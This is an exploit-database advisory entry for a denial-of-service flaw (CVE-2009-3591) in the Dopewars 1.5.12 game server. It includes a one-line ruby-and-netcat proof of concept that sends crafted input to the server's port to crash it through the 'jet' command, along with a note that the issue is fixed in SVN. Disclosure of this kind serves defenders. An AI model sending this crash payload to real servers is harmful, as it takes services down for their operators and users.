Dopewars Server 1.5.12 - Denial of Service
| EKU-ID: 17675 | CVE: CVE-2009-3591;OSVDB-58884 | OSVDB-ID: |
| Author: Doug Prostko | Published: 2009-10-06 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 17675 | CVE: CVE-2009-3591;OSVDB-58884 | OSVDB-ID: |
| Author: Doug Prostko | Published: 2009-10-06 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
## Description ## The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation. ## POC ## ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902 ## Fix ## This issue is resolved in the SVN version of the application. ## Discovered by Doug Prostko